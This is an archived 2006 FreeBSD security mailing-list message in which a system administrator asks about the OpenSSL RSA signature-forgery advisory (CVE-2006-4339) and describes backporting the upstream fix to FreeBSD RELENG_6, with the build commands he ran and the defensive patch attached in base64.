From owner-freebsd-security@FreeBSD.ORG Tue Sep 5 15:56:35 2006 Return-Path: X-Original-To: freebsd-security@FreeBSD.org Delivered-To: freebsd-security@FreeBSD.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7FD9916A4E1; Tue, 5 Sep 2006 15:56:35 +0000 (UTC) (envelope-from mike@sentex.net) Received: from smarthost1.sentex.ca (smarthost1.sentex.ca [64.7.153.18]) by mx1.FreeBSD.org (Postfix) with ESMTP id 0249443D45; Tue, 5 Sep 2006 15:56:31 +0000 (GMT) (envelope-from mike@sentex.net) Received: from lava.sentex.ca (pyroxene.sentex.ca [199.212.134.18]) by smarthost1.sentex.ca (8.13.6/8.13.6) with ESMTP id k85FuU49065679; Tue, 5 Sep 2006 11:56:30 -0400 (EDT) (envelope-from mike@sentex.net) Received: from mdt-xp.sentex.net (simeon.sentex.ca [192.168.43.27]) by lava.sentex.ca (8.13.6/8.13.3) with ESMTP id k85FuUnc006943 (version=TLSv1/SSLv3 cipher=DHE-RSA-AES256-SHA bits=256 verify=NO); Tue, 5 Sep 2006 11:56:30 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <7.0.1.0.0.20060905112743.149f17c8@sentex.net> X-Mailer: QUALCOMM Windows Eudora Version 7.0.1.0 Date: Tue, 05 Sep 2006 11:56:30 -0400 To: freebsd-security@FreeBSD.org From: Mike Tancsa In-Reply-To: <7.0.1.0.0.20060905105253.149db9a8@sentex.net> References: <7.0.1.0.0.20060905105253.149db9a8@sentex.net> Mime-Version: 1.0 Content-Type: multipart/mixed; boundary="=====================_10086109==_" X-Virus-Scanned: ClamAV version 0.88.3, clamav-milter version 0.88.3 on clamscanner2 X-Virus-Status: Clean Cc: Subject: Re: http://www.openssl.org/news/secadv_20060905.txt X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: "Security issues \[members-only posting\]" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 05 Sep 2006 15:56:35 -0000 --=====================_10086109==_ Content-Type: text/plain; charset="us-ascii"; format=flowed At 10:53 AM 9/5/2006, Mike Tancsa wrote: >Does anyone know the practicality of this attack ? i.e. is this >trivial to do ? Also, for RELENG_6, can someone confirm the patch referenced in http://www.openssl.org/news/patch-CVE-2006-4339.txt be applied with the one change of +{ERR_REASON(RSA_R_PKCS1_PADDING_TOO_SHORT),"pkcs1 padding too short"}, to +{RSA_R_PKCS1_PADDING_TOO_SHORT,"pkcs1 padding too short"}, I manually added in the diffs and everything seems to compile and function with some limited testing. I did cd /usr/src/crypton/openssl/crypto/rsa patch < p cd /usr/src/secure make clean make obj make depend make includes make make install > ---Mike > >-------------------------------------------------------------------- >Mike Tancsa, tel +1 519 651 3400 >Sentex Communications, mike@sentex.net >Providing Internet since 1994 www.sentex.net >Cambridge, Ontario Canada www.sentex.net/mike > >_______________________________________________ >freebsd-security@freebsd.org mailing list >http://lists.freebsd.org/mailman/listinfo/freebsd-security >To unsubscribe, send any mail to "freebsd-security-unsubscribe@freebsd.org" --=====================_10086109==_ Content-Type: application/octet-stream; name="p" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="p" KioqIHJzYS5oLm9sZAlGcmkgRmViIDI1IDAwOjQ5OjQzIDIwMDUKLS0tIHJzYS5oCVR1ZSBTZXAg IDUgMTE6MzU6MTAgMjAwNgoqKioqKioqKioqKioqKioKKioqIDM1MiwzNTcgKioqKgotLS0gMzUy LDM1OCAtLS0tCiAgI2RlZmluZSBSU0FfUl9OX0RPRVNfTk9UX0VRVUFMX1BfUQkJCSAxMjcKICAj ZGVmaW5lIFJTQV9SX09BRVBfREVDT0RJTkdfRVJST1IJCQkgMTIxCiAgI2RlZmluZSBSU0FfUl9Q QURESU5HX0NIRUNLX0ZBSUxFRAkJCSAxMTQKKyAjZGVmaW5lIFJTQV9SX1BLQ1MxX1BBRERJTkdf VE9PX1NIT1JUCQkJIDEwNQogICNkZWZpbmUgUlNBX1JfUF9OT1RfUFJJTUUJCQkJIDEyOAogICNk ZWZpbmUgUlNBX1JfUV9OT1RfUFJJTUUJCQkJIDEyOQogICNkZWZpbmUgUlNBX1JfUlNBX09QRVJB VElPTlNfTk9UX1NVUFBPUlRFRAkJIDEzMAoqKiogcnNhX2VheS5jLm9sZAlUdWUgU2VwICA1IDEx OjM0OjUwIDIwMDYKLS0tIHJzYV9lYXkuYwlUdWUgU2VwICA1IDExOjM2OjAwIDIwMDYKKioqKioq KioqKioqKioqCioqKiA1NjksNTc0ICoqKioKLS0tIDU2OSw1ODQgLS0tLQogIAkJewogIAljYXNl IFJTQV9QS0NTMV9QQURESU5HOgogIAkJcj1SU0FfcGFkZGluZ19jaGVja19QS0NTMV90eXBlXzEo dG8sbnVtLGJ1ZixpLG51bSk7CisgCQkvKiBHZW5lcmFsbHkgc2lnbmF0dXJlcyBzaG91bGQgYmUg YXQgbGVhc3QgMi8zIHBhZGRpbmcsIHRob3VnaAorIAkJICAgdGhpcyBpc24ndCBwb3NzaWJsZSBm b3IgcmVhbGx5IHNob3J0IGtleXMgYW5kIHNvbWUgc3RhbmRhcmQKKyAJCSAgIHNpZ25hdHVyZSBz Y2hlbWVzLCBzbyBkb24ndCBjaGVjayBpZiB0aGUgdW5wYWRkZWQgZGF0YSBpcworIAkJICAgc21h bGwuICovCisgCQlpZihyID4gNDIgJiYgMyo4KnIgPj0gQk5fbnVtX2JpdHMocnNhLT5uKSkKKyAJ CQl7CisgCQkJUlNBZXJyKFJTQV9GX1JTQV9FQVlfUFVCTElDX0RFQ1JZUFQsIFJTQV9SX1BLQ1Mx X1BBRERJTkdfVE9PX1NIT1JUKTsKKyAJCQlnb3RvIGVycjsKKyAJCQl9CisgCiAgCQlicmVhazsK ICAJY2FzZSBSU0FfTk9fUEFERElORzoKICAJCXI9UlNBX3BhZGRpbmdfY2hlY2tfbm9uZSh0byxu dW0sYnVmLGksbnVtKTsKKioqIHJzYV9lcnIuYy5vbGQJVHVlIFNlcCAgNSAxMTozNjowOSAyMDA2 Ci0tLSByc2FfZXJyLmMJVHVlIFNlcCAgNSAxMTozNjozOSAyMDA2CioqKioqKioqKioqKioqKgoq KiogMTIwLDEyNSAqKioqCi0tLSAxMjAsMTI2IC0tLS0KICB7UlNBX1JfTl9ET0VTX05PVF9FUVVB TF9QX1EgICAgICAgICAgICAgICwibiBkb2VzIG5vdCBlcXVhbCBwIHEifSwKICB7UlNBX1JfT0FF UF9ERUNPRElOR19FUlJPUiAgICAgICAgICAgICAgICwib2FlcCBkZWNvZGluZyBlcnJvciJ9LAog IHtSU0FfUl9QQURESU5HX0NIRUNLX0ZBSUxFRCAgICAgICAgICAgICAgLCJwYWRkaW5nIGNoZWNr IGZhaWxlZCJ9LAorIHtSU0FfUl9QS0NTMV9QQURESU5HX1RPT19TSE9SVCAgICAgICAgICAgLCJw a2NzMSBwYWRkaW5nIHRvbyBzaG9ydCJ9LAogIHtSU0FfUl9QX05PVF9QUklNRSAgICAgICAgICAg ICAgICAgICAgICAgLCJwIG5vdCBwcmltZSJ9LAogIHtSU0FfUl9RX05PVF9QUklNRSAgICAgICAg ICAgICAgICAgICAgICAgLCJxIG5vdCBwcmltZSJ9LAogIHtSU0FfUl9SU0FfT1BFUkFUSU9OU19O T1RfU1VQUE9SVEVEICAgICAgLCJyc2Egb3BlcmF0aW9ucyBub3Qgc3VwcG9ydGVkIn0sCioqKiBy c2Ffc2lnbi5jLm9sZAlXZWQgT2N0ICAxIDA4OjMyOjM5IDIwMDMKLS0tIHJzYV9zaWduLmMJVHVl IFNlcCAgNSAxMTozNzoyOSAyMDA2CioqKioqKioqKioqKioqKgoqKiogMTg1LDE5MCAqKioqCi0t LSAxODUsMjA4IC0tLS0KICAJCXNpZz1kMmlfWDUwOV9TSUcoTlVMTCwmcCwobG9uZylpKTsKICAK ICAJCWlmIChzaWcgPT0gTlVMTCkgZ290byBlcnI7CisgCisgCQkvKiBFeGNlc3MgZGF0YSBjYW4g YmUgdXNlZCB0byBjcmVhdGUgZm9yZ2VyaWVzICovCisgCQlpZihwICE9IHMraSkKKyAJCQl7Cisg CQkJUlNBZXJyKFJTQV9GX1JTQV9WRVJJRlksUlNBX1JfQkFEX1NJR05BVFVSRSk7CisgCQkJZ290 byBlcnI7CisgCQkJfQorIAorIAkJLyogUGFyYW1ldGVycyB0byB0aGUgc2lnbmF0dXJlIGFsZ29y aXRobSBjYW4gYWxzbyBiZSB1c2VkIHRvCisgCQkgICBjcmVhdGUgZm9yZ2VyaWVzICovCisgCQlp ZihzaWctPmFsZ29yLT5wYXJhbWV0ZXIKKyAJCSAgICYmIEFTTjFfVFlQRV9nZXQoc2lnLT5hbGdv ci0+cGFyYW1ldGVyKSAhPSBWX0FTTjFfTlVMTCkKKyAJCQl7CisgCQkJUlNBZXJyKFJTQV9GX1JT QV9WRVJJRlksUlNBX1JfQkFEX1NJR05BVFVSRSk7CisgCQkJZ290byBlcnI7CisgCQkJfQorIAor IAogIAkJc2lndHlwZT1PQkpfb2JqMm5pZChzaWctPmFsZ29yLT5hbGdvcml0aG0pOwogIAogIAo= --=====================_10086109==_--